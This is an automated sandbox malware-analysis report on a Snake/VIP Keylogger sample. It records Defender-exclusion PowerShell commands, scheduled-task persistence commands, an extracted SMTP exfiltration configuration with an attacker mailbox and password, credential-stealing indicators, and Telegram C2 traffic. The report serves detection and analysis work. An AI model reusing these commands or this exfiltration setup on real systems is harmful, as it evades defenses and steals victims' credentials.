Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
PvAmrCZENy.exe

Overview

General Information

Sample name:PvAmrCZENy.exe
renamed because original name is a hash value
Original sample name:b9581e9af28f052e463acd6117271db974830bba5a7ba5825068596947e872bd.exe
Analysis ID:1631776
MD5:9a7aa05c524e4fb22014c30c6f9c7576
SHA1:e093274645aebbd22bb243279d6d6511c53e0f52
SHA256:b9581e9af28f052e463acd6117271db974830bba5a7ba5825068596947e872bd
Tags:exeuser-adrian__luca
Infos:

Detection

Snake Keylogger, VIP Keylogger
Score:100
Range:0 - 100
Confidence:100%

Signatures

Antivirus / Scanner detection for submitted sample
Antivirus detection for dropped file
Found malware configuration
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
Sigma detected: Scheduled temp file as task from temp location
Suricata IDS alerts for network traffic
Yara detected AntiVM3
Yara detected Snake Keylogger
Yara detected Telegram RAT
Yara detected VIP Keylogger
.NET source code contains potential unpacker
.NET source code references suspicious native API functions
Adds a directory exclusion to Windows Defender
Contains functionality to capture screen (.Net source)
Contains functionality to log keystrokes (.Net Source)
Injects a PE file into a foreign processes
Joe Sandbox ML detected suspicious sample
Loading BitLocker PowerShell Module
Sample uses string decryption to hide its real strings
Sigma detected: Potentially Suspicious PowerShell Child Processes
Sigma detected: Powershell Base64 Encoded MpPreference Cmdlet
Tries to detect the country of the analysis system (by using the IP)
Tries to harvest and steal browser information (history, passwords, etc)
Tries to steal Mail credentials (via file / registry access)
Uses schtasks.exe or at.exe to add and modify task schedules
Uses the Telegram API (likely for C&C communication)
Allocates memory with a write watch (potentially for evading sandboxes)
Binary contains a suspicious time stamp
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Creates files inside the system directory
Detected potential crypto function
Drops PE files
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found inlined nop instructions (likely shell or obfuscated code)
HTTP GET or POST without a user agent
IP address seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May check the online IP address of the machine
May sleep (evasive loops) to hinder dynamic analysis
Queries disk information (often used to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Sigma detected: Powershell Defender Exclusion
Sigma detected: Suspicious Add Scheduled Task Parent
Sigma detected: Suspicious Schtasks From Env Var Folder
Suricata IDS alerts with low severity for network traffic
Uses 32bit PE files
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Uses insecure TLS / SSL version for HTTPS connection
Yara detected Credential Stealer
Yara signature match

Classification

  • System is w10x64
  • PvAmrCZENy.exe (PID: 7112 cmdline: "C:\Users\user\Desktop\PvAmrCZENy.exe" MD5: 9A7AA05C524E4FB22014C30C6F9C7576)
    • powershell.exe (PID: 6240 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\PvAmrCZENy.exe" MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)
      • conhost.exe (PID: 6416 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • powershell.exe (PID: 6512 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\yxXYABHh.exe" MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)
      • conhost.exe (PID: 6516 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • schtasks.exe (PID: 2872 cmdline: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\yxXYABHh" /XML "C:\Users\user\AppData\Local\Temp\tmp4DA1.tmp" MD5: 48C2FE20575769DE916F48EF0676A965)
      • conhost.exe (PID: 5832 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • WmiPrvSE.exe (PID: 2872 cmdline: C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding MD5: 60FF40CFD7FB8FE41EE4FE9AE5FE1C51)
    • PvAmrCZENy.exe (PID: 6120 cmdline: "C:\Users\user\Desktop\PvAmrCZENy.exe" MD5: 9A7AA05C524E4FB22014C30C6F9C7576)
  • yxXYABHh.exe (PID: 5912 cmdline: C:\Users\user\AppData\Roaming\yxXYABHh.exe MD5: 9A7AA05C524E4FB22014C30C6F9C7576)
    • schtasks.exe (PID: 7268 cmdline: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\yxXYABHh" /XML "C:\Users\user\AppData\Local\Temp\tmp5E89.tmp" MD5: 48C2FE20575769DE916F48EF0676A965)
      • conhost.exe (PID: 7276 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • yxXYABHh.exe (PID: 7320 cmdline: "C:\Users\user\AppData\Roaming\yxXYABHh.exe" MD5: 9A7AA05C524E4FB22014C30C6F9C7576)
  • svchost.exe (PID: 7564 cmdline: C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS MD5: B7F884C1B74A263F746EE12A5F7C9F6A)
  • cleanup
NameDescriptionAttributionBlogpost URLsLink
404 Keylogger, Snake KeyloggerSnake Keylogger (aka 404 Keylogger) is a subscription-based keylogger that has many capabilities. The infostealer can steal a victims sensitive information, log keyboard strokes, take screenshots and extract information from the system clipboard. It was initially released on a Russian hacking forum in August 2019. It is notable for its relatively unusual methods of data exfiltration, including via email, FTP, SMTP, Pastebin or the messaging app Telegram.No Attributionhttps://malpedia.caad.fkie.fraunhofer.de/details/win.404keylogger
{"Exfil Mode": "SMTP", "Email ID": "royals@htcp.homes", "Password": "7213575aceACE@@", "Host": "mail.htcp.homes", "Port": "587"}
{"Exfil Mode": "SMTP", "Username": "royals@htcp.homes", "Password": "7213575aceACE@@", "Host": "mail.htcp.homes", "Port": "587", "Version": "4.4"}
SourceRuleDescriptionAuthorStrings
00000008.00000002.945371389.0000000003949000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_CredentialStealerYara detected Credential StealerJoe Security
    00000008.00000002.945371389.0000000003949000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_VIPKeyloggerYara detected VIP KeyloggerJoe Security
      00000008.00000002.945371389.0000000003949000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_TelegramRATYara detected Telegram RATJoe Security
        00000008.00000002.945371389.0000000003949000.00000004.00000800.00020000.00000000.sdmpWindows_Trojan_SnakeKeylogger_af3faa65unknownunknown
        • 0x2e610:$a1: get_encryptedPassword
        • 0x71430:$a1: get_encryptedPassword
        • 0x2eb98:$a2: get_encryptedUsername
        • 0x719b8:$a2: get_encryptedUsername
        • 0x2e283:$a3: get_timePasswordChanged
        • 0x710a3:$a3: get_timePasswordChanged
        • 0x2e39a:$a4: get_passwordField
        • 0x711ba:$a4: get_passwordField
        • 0x2e626:$a5: set_encryptedPassword
        • 0x71446:$a5: set_encryptedPassword
        • 0x31342:$a6: get_passwords
        • 0x74162:$a6: get_passwords
        • 0x316d6:$a7: get_logins
        • 0x744f6:$a7: get_logins
        • 0x3132e:$a8: GetOutlookPasswords
        • 0x7414e:$a8: GetOutlookPasswords
        • 0x30ce7:$a9: StartKeylogger
        • 0x73b07:$a9: StartKeylogger
        • 0x3162f:$a10: KeyLoggerEventArgs
        • 0x7444f:$a10: KeyLoggerEventArgs
        • 0x30d87:$a11: KeyLoggerEventArgsEventHandler
        00000008.00000002.945371389.0000000004149000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_CredentialStealerYara detected Credential StealerJoe Security
          Click to see the 22 entries
          SourceRuleDescriptionAuthorStrings
          8.2.yxXYABHh.exe.4149990.3.raw.unpackJoeSecurity_CredentialStealerYara detected Credential StealerJoe Security
            8.2.yxXYABHh.exe.4149990.3.raw.unpackJoeSecurity_VIPKeyloggerYara detected VIP KeyloggerJoe Security
              8.2.yxXYABHh.exe.4149990.3.raw.unpackJoeSecurity_TelegramRATYara detected Telegram RATJoe Security
                8.2.yxXYABHh.exe.4149990.3.raw.unpackWindows_Trojan_SnakeKeylogger_af3faa65unknownunknown
                • 0x2dca0:$a1: get_encryptedPassword
                • 0x2e228:$a2: get_encryptedUsername
                • 0x2d913:$a3: get_timePasswordChanged
                • 0x2da2a:$a4: get_passwordField
                • 0x2dcb6:$a5: set_encryptedPassword
                • 0x309d2:$a6: get_passwords
                • 0x30d66:$a7: get_logins
                • 0x309be:$a8: GetOutlookPasswords
                • 0x30377:$a9: StartKeylogger
                • 0x30cbf:$a10: KeyLoggerEventArgs
                • 0x30417:$a11: KeyLoggerEventArgsEventHandler
                8.2.yxXYABHh.exe.4149990.3.raw.unpackMAL_Envrial_Jan18_1Detects Encrial credential stealer malwareFlorian Roth
                • 0x3b28e:$a2: \Comodo\Dragon\User Data\Default\Login Data
                • 0x3a931:$a3: \Google\Chrome\User Data\Default\Login Data
                • 0x3ab8e:$a4: \Orbitum\User Data\Default\Login Data
                • 0x3b56d:$a5: \Kometa\User Data\Default\Login Data
                Click to see the 41 entries

                System Summary

                barindex
                Source: Process startedAuthor: Florian Roth (Nextron Systems), Tim Shelton: Data: Command: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\yxXYABHh" /XML "C:\Users\user\AppData\Local\Temp\tmp4DA1.tmp", CommandLine: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\yxXYABHh" /XML "C:\Users\user\AppData\Local\Temp\tmp4DA1.tmp", CommandLine|base64offset|contains: *j, Image: C:\Windows\SysWOW64\schtasks.exe, NewProcessName: C:\Windows\SysWOW64\schtasks.exe, OriginalFileName: C:\Windows\SysWOW64\schtasks.exe, ParentCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\yxXYABHh.exe", ParentImage: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentProcessId: 6512, ParentProcessName: powershell.exe, ProcessCommandLine: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\yxXYABHh" /XML "C:\Users\user\AppData\Local\Temp\tmp4DA1.tmp", ProcessId: 2872, ProcessName: schtasks.exe
                Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\PvAmrCZENy.exe", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\PvAmrCZENy.exe", CommandLine|base64offset|contains: ~2yzw, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\PvAmrCZENy.exe", ParentImage: C:\Users\user\Desktop\PvAmrCZENy.exe, ParentProcessId: 7112, ParentProcessName: PvAmrCZENy.exe, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\PvAmrCZENy.exe", ProcessId: 6240, ProcessName: powershell.exe
                Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\PvAmrCZENy.exe", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\PvAmrCZENy.exe", CommandLine|base64offset|contains: ~2yzw, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\PvAmrCZENy.exe", ParentImage: C:\Users\user\Desktop\PvAmrCZENy.exe, ParentProcessId: 7112, ParentProcessName: PvAmrCZENy.exe, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\PvAmrCZENy.exe", ProcessId: 6240, ProcessName: powershell.exe
                Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\yxXYABHh" /XML "C:\Users\user\AppData\Local\Temp\tmp5E89.tmp", CommandLine: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\yxXYABHh" /XML "C:\Users\user\AppData\Local\Temp\tmp5E89.tmp", CommandLine|base64offset|contains: *j, Image: C:\Windows\SysWOW64\schtasks.exe, NewProcessName: C:\Windows\SysWOW64\schtasks.exe, OriginalFileName: C:\Windows\SysWOW64\schtasks.exe, ParentCommandLine: C:\Users\user\AppData\Roaming\yxXYABHh.exe, ParentImage: C:\Users\user\AppData\Roaming\yxXYABHh.exe, ParentProcessId: 5912, ParentProcessName: yxXYABHh.exe, ProcessCommandLine: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\yxXYABHh" /XML "C:\Users\user\AppData\Local\Temp\tmp5E89.tmp", ProcessId: 7268, ProcessName: schtasks.exe
                Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\yxXYABHh" /XML "C:\Users\user\AppData\Local\Temp\tmp4DA1.tmp", CommandLine: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\yxXYABHh" /XML "C:\Users\user\AppData\Local\Temp\tmp4DA1.tmp", CommandLine|base64offset|contains: *j, Image: C:\Windows\SysWOW64\schtasks.exe, NewProcessName: C:\Windows\SysWOW64\schtasks.exe, OriginalFileName: C:\Windows\SysWOW64\schtasks.exe, ParentCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\yxXYABHh.exe", ParentImage: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentProcessId: 6512, ParentProcessName: powershell.exe, ProcessCommandLine: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\yxXYABHh" /XML "C:\Users\user\AppData\Local\Temp\tmp4DA1.tmp", ProcessId: 2872, ProcessName: schtasks.exe
                Source: Process startedAuthor: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\PvAmrCZENy.exe", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\PvAmrCZENy.exe", CommandLine|base64offset|contains: ~2yzw, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\PvAmrCZENy.exe", ParentImage: C:\Users\user\Desktop\PvAmrCZENy.exe, ParentProcessId: 7112, ParentProcessName: PvAmrCZENy.exe, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\PvAmrCZENy.exe", ProcessId: 6240, ProcessName: powershell.exe
                Source: Process startedAuthor: vburov: Data: Command: C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS, CommandLine: C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS, CommandLine|base64offset|contains: , Image: C:\Windows\System32\svchost.exe, NewProcessName: C:\Windows\System32\svchost.exe, OriginalFileName: C:\Windows\System32\svchost.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 628, ProcessCommandLine: C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS, ProcessId: 7564, ProcessName: svchost.exe

                Persistence and Installation Behavior

                barindex
                Source: Process startedAuthor: Joe Security: Data: Command: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\yxXYABHh" /XML "C:\Users\user\AppData\Local\Temp\tmp4DA1.tmp", CommandLine: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\yxXYABHh" /XML "C:\Users\user\AppData\Local\Temp\tmp4DA1.tmp", CommandLine|base64offset|contains: *j, Image: C:\Windows\SysWOW64\schtasks.exe, NewProcessName: C:\Windows\SysWOW64\schtasks.exe, OriginalFileName: C:\Windows\SysWOW64\schtasks.exe, ParentCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\yxXYABHh.exe", ParentImage: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentProcessId: 6512, ParentProcessName: powershell.exe, ProcessCommandLine: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\yxXYABHh" /XML "C:\Users\user\AppData\Local\Temp\tmp4DA1.tmp", ProcessId: 2872, ProcessName: schtasks.exe
                TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                2025-03-07T15:38:22.874287+010028033053Unknown Traffic192.168.2.749684104.21.96.1443TCP
                2025-03-07T15:38:26.547232+010028033053Unknown Traffic192.168.2.749688104.21.96.1443TCP
                2025-03-07T15:38:41.715441+010028033053Unknown Traffic192.168.2.749703104.21.96.1443TCP
                2025-03-07T15:38:45.341959+010028033053Unknown Traffic192.168.2.749708104.21.96.1443TCP
                2025-03-07T15:38:48.909525+010028033053Unknown Traffic192.168.2.749712104.21.96.1443TCP
                2025-03-07T15:38:48.909675+010028033053Unknown Traffic192.168.2.749711104.21.96.1443TCP
                TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                2025-03-07T15:38:17.604530+010028032742Potentially Bad Traffic192.168.2.749681132.226.8.16980TCP
                2025-03-07T15:38:20.510790+010028032742Potentially Bad Traffic192.168.2.749681132.226.8.16980TCP
                2025-03-07T15:38:21.448255+010028032742Potentially Bad Traffic192.168.2.749683132.226.8.16980TCP
                2025-03-07T15:38:23.917020+010028032742Potentially Bad Traffic192.168.2.749686132.226.8.16980TCP
                2025-03-07T15:38:24.198311+010028032742Potentially Bad Traffic192.168.2.749683132.226.8.16980TCP
                2025-03-07T15:38:27.276560+010028032742Potentially Bad Traffic192.168.2.749689132.226.8.16980TCP
                2025-03-07T15:38:28.120234+010028032742Potentially Bad Traffic192.168.2.749690132.226.8.16980TCP
                2025-03-07T15:38:31.057892+010028032742Potentially Bad Traffic192.168.2.749693132.226.8.16980TCP
                TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                2025-03-07T15:38:51.734129+010018100071Potentially Bad Traffic192.168.2.749716149.154.167.220443TCP
                2025-03-07T15:38:55.290739+010018100071Potentially Bad Traffic192.168.2.749720149.154.167.220443TCP

                Click to jump to signature section

                Show All Signature Results

                AV Detection

                barindex
                Source: PvAmrCZENy.exeAvira: detected
                Source: C:\Users\user\AppData\Roaming\yxXYABHh.exeAvira: detection malicious, Label: TR/Kryptik.jxxgz
                Source: 00000008.00000002.945371389.0000000003949000.00000004.00000800.00020000.00000000.sdmpMalware Configuration Extractor: VIP Keylogger {"Exfil Mode": "SMTP", "Email ID": "royals@htcp.homes", "Password": "7213575aceACE@@", "Host": "mail.htcp.homes", "Port": "587"}
                Source: 00000008.00000002.945371389.0000000003949000.00000004.00000800.00020000.00000000.sdmpMalware Configuration Extractor: Snake Keylogger {"Exfil Mode": "SMTP", "Username": "royals@htcp.homes", "Password": "7213575aceACE@@", "Host": "mail.htcp.homes", "Port": "587", "Version": "4.4"}
                Source: C:\Users\user\AppData\Roaming\yxXYABHh.exeReversingLabs: Detection: 71%
                Source: PvAmrCZENy.exeVirustotal: Detection: 77%Perma Link
                Source: PvAmrCZENy.exeReversingLabs: Detection: 71%
                Source: Submited SampleIntegrated Neural Analysis Model: Matched 100.0% probability
                Source: 0.2.PvAmrCZENy.exe.4d93e00.2.raw.unpackString decryptor: royals@htcp.homes
                Source: 0.2.PvAmrCZENy.exe.4d93e00.2.raw.unpackString decryptor: 7213575aceACE@@
                Source: 0.2.PvAmrCZENy.exe.4d93e00.2.raw.unpackString decryptor: mail.htcp.homes
                Source: 0.2.PvAmrCZENy.exe.4d93e00.2.raw.unpackString decryptor: royal@htcp.homes
                Source: 0.2.PvAmrCZENy.exe.4d93e00.2.raw.unpackString decryptor: 587
                Source: 0.2.PvAmrCZENy.exe.4d93e00.2.raw.unpackString decryptor:
                Source: 0.2.PvAmrCZENy.exe.4d93e00.2.raw.unpackString decryptor: royals@htcp.homes
                Source: 0.2.PvAmrCZENy.exe.4d93e00.2.raw.unpackString decryptor: 7213575aceACE@@
                Source: 0.2.PvAmrCZENy.exe.4d93e00.2.raw.unpackString decryptor: mail.htcp.homes
                Source: 0.2.PvAmrCZENy.exe.4d93e00.2.raw.unpackString decryptor: royal@htcp.homes
                Source: 0.2.PvAmrCZENy.exe.4d93e00.2.raw.unpackString decryptor: 587
                Source: 0.2.PvAmrCZENy.exe.4d93e00.2.raw.unpackString decryptor:
                Source: 0.2.PvAmrCZENy.exe.4d93e00.2.raw.unpackString decryptor: royals@htcp.homes
                Source: 0.2.PvAmrCZENy.exe.4d93e00.2.raw.unpackString decryptor: 7213575aceACE@@
                Source: 0.2.PvAmrCZENy.exe.4d93e00.2.raw.unpackString decryptor: mail.htcp.homes
                Source: 0.2.PvAmrCZENy.exe.4d93e00.2.raw.unpackString decryptor: royal@htcp.homes
                Source: 0.2.PvAmrCZENy.exe.4d93e00.2.raw.unpackString decryptor: 587
                Source: 0.2.PvAmrCZENy.exe.4d93e00.2.raw.unpackString decryptor:

                Location Tracking

                barindex
                Source: unknownDNS query: name: reallyfreegeoip.org
                Source: PvAmrCZENy.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
                Source: unknownHTTPS traffic detected: 104.21.96.1:443 -> 192.168.2.7:49682 version: TLS 1.0
                Source: unknownHTTPS traffic detected: 104.21.96.1:443 -> 192.168.2.7:49685 version: TLS 1.0
                Source: unknownHTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.7:49716 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.7:49720 version: TLS 1.2
                Source: PvAmrCZENy.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                Source: Binary string: nqHL.pdb source: PvAmrCZENy.exe, yxXYABHh.exe.0.dr
                Source: Binary string: nqHL.pdbSHA256T source: PvAmrCZENy.exe, yxXYABHh.exe.0.dr
                Source: C:\Users\user\Desktop\PvAmrCZENy.exeCode function: 4x nop then jmp 0244F8E9h7_2_0244F631
                Source: C:\Users\user\Desktop\PvAmrCZENy.exeCode function: 4x nop then jmp 0244FD41h7_2_0244FA88
                Source: C:\Users\user\Desktop\PvAmrCZENy.exeCode function: 4x nop then jmp 064031E0h7_2_06402DC8
                Source: C:\Users\user\Desktop\PvAmrCZENy.exeCode function: 4x nop then jmp 06400D0Dh7_2_06400B30
                Source: C:\Users\user\Desktop\PvAmrCZENy.exeCode function: 4x nop then jmp 06401697h7_2_06400B30
                Source: C:\Users\user\Desktop\PvAmrCZENy.exeCode function: 4x nop then jmp 06402C19h7_2_06402968
                Source: C:\Users\user\Desktop\PvAmrCZENy.exeCode function: 4x nop then jmp 0640E0A9h7_2_0640DE00
                Source: C:\Users\user\Desktop\PvAmrCZENy.exeCode function: 4x nop then jmp 0640E959h7_2_0640E6B0
                Source: C:\Users\user\Desktop\PvAmrCZENy.exeCode function: 4x nop then jmp 0640F209h7_2_0640EF60
                Source: C:\Users\user\Desktop\PvAmrCZENy.exeCode function: 4x nop then jmp 0640CF49h7_2_0640CCA0
                Source: C:\Users\user\Desktop\PvAmrCZENy.exeCode function: 4x nop then jmp 0640D7F9h7_2_0640D550
                Source: C:\Users\user\Desktop\PvAmrCZENy.exeCode function: 4x nop then jmp 064031E0h7_2_06402DC2
                Source: C:\Users\user\Desktop\PvAmrCZENy.exeCode function: 4x nop then jmp 0640E501h7_2_0640E258
                Source: C:\Users\user\Desktop\PvAmrCZENy.exeCode function: 4x nop then jmp 0640EDB1h7_2_0640EB08
                Source: C:\Users\user\Desktop\PvAmrCZENy.exeCode function: 4x nop then jmp 0640F661h7_2_0640F3B8
                Source: C:\Users\user\Desktop\PvAmrCZENy.exeCode function: 4x nop then mov dword ptr [ebp-14h], 00000000h7_2_06400040
                Source: C:\Users\user\Desktop\PvAmrCZENy.exeCode function: 4x nop then jmp 0640FAB9h7_2_0640F810
                Source: C:\Users\user\Desktop\PvAmrCZENy.exeCode function: 4x nop then jmp 0640D3A1h7_2_0640D0F8
                Source: C:\Users\user\Desktop\PvAmrCZENy.exeCode function: 4x nop then jmp 064031E0h7_2_0640310E
                Source: C:\Users\user\Desktop\PvAmrCZENy.exeCode function: 4x nop then jmp 0640DC51h7_2_0640D9A8
                Source: C:\Users\user\AppData\Roaming\yxXYABHh.exeCode function: 4x nop then jmp 06A0BAD3h8_2_06A0B265
                Source: C:\Users\user\AppData\Roaming\yxXYABHh.exeCode function: 4x nop then jmp 02BAF8E9h12_2_02BAF631
                Source: C:\Users\user\AppData\Roaming\yxXYABHh.exeCode function: 4x nop then jmp 02BAFD41h12_2_02BAFA88
                Source: C:\Users\user\AppData\Roaming\yxXYABHh.exeCode function: 4x nop then jmp 0587DC51h12_2_0587D9A8
                Source: C:\Users\user\AppData\Roaming\yxXYABHh.exeCode function: 4x nop then jmp 058731E0h12_2_05872DBE
                Source: C:\Users\user\AppData\Roaming\yxXYABHh.exeCode function: 4x nop then jmp 058731E0h12_2_05872DC8
                Source: C:\Users\user\AppData\Roaming\yxXYABHh.exeCode function: 4x nop then jmp 058731E0h12_2_0587310E
                Source: C:\Users\user\AppData\Roaming\yxXYABHh.exeCode function: 4x nop then jmp 0587D7F9h12_2_0587D550
                Source: C:\Users\user\AppData\Roaming\yxXYABHh.exeCode function: 4x nop then jmp 05872C19h12_2_05872968
                Source: C:\Users\user\AppData\Roaming\yxXYABHh.exeCode function: 4x nop then jmp 0587CF49h12_2_0587CCA0
                Source: C:\Users\user\AppData\Roaming\yxXYABHh.exeCode function: 4x nop then jmp 0587D3A1h12_2_0587D0F8
                Source: C:\Users\user\AppData\Roaming\yxXYABHh.exeCode function: 4x nop then jmp 0587FAB9h12_2_0587F810
                Source: C:\Users\user\AppData\Roaming\yxXYABHh.exeCode function: 4x nop then mov dword ptr [ebp-14h], 00000000h12_2_05870040
                Source: C:\Users\user\AppData\Roaming\yxXYABHh.exeCode function: 4x nop then mov dword ptr [ebp-14h], 00000000h12_2_05870853
                Source: C:\Users\user\AppData\Roaming\yxXYABHh.exeCode function: 4x nop then jmp 0587F661h12_2_0587F3B8
                Source: C:\Users\user\AppData\Roaming\yxXYABHh.exeCode function: 4x nop then jmp 0587EDB1h12_2_0587EB08
                Source: C:\Users\user\AppData\Roaming\yxXYABHh.exeCode function: 4x nop then jmp 05870D0Dh12_2_05870B30
                Source: C:\Users\user\AppData\Roaming\yxXYABHh.exeCode function: 4x nop then jmp 05871697h12_2_05870B30
                Source: C:\Users\user\AppData\Roaming\yxXYABHh.exeCode function: 4x nop then jmp 0587F209h12_2_0587EF60
                Source: C:\Users\user\AppData\Roaming\yxXYABHh.exeCode function: 4x nop then jmp 0587E959h12_2_0587E6B0
                Source: C:\Users\user\AppData\Roaming\yxXYABHh.exeCode function: 4x nop then jmp 0587E0A9h12_2_0587DE00
                Source: C:\Users\user\AppData\Roaming\yxXYABHh.exeCode function: 4x nop then jmp 0587E501h12_2_0587E258
                Source: C:\Users\user\AppData\Roaming\yxXYABHh.exeCode function: 4x nop then mov dword ptr [ebp-14h], 00000000h12_2_05870673

                Networking

                barindex
                Source: Network trafficSuricata IDS: 1810007 - Severity 1 - Joe Security ANOMALY Telegram Send Message : 192.168.2.7:49720 -> 149.154.167.220:443
                Source: Network trafficSuricata IDS: 1810007 - Severity 1 - Joe Security ANOMALY Telegram Send Message : 192.168.2.7:49716 -> 149.154.167.220:443
                Source: unknownDNS query: name: api.telegram.org
                Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
                Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.org
                Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
                Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
                Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.org
                Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
                Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
                Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
                Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
